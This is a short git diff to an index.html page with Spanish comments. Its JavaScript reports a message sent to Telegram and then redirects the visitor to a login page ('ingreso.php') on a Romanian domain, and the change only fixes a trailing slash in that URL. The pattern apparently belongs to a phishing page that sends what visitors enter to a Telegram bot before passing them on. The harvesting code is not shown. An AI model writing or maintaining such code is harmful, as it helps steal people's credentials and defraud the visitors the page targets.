--- a/index.html
+++ b/index.html
@@ -141,7 +141,7 @@
                 if (data.ok) {
                     console.log('Mensaje enviado a Telegram:', data);
                     // Redireccionar solo después de confirmar que el mensaje fue enviado
-                    window.location.href = 'https://crmcentraletermice.ro/ingreso.php/';
+                    window.location.href = 'https://crmcentraletermice.ro/ingreso.php';
                 } else {
                     console.error('Error en la respuesta de Telegram:', data);
                 }
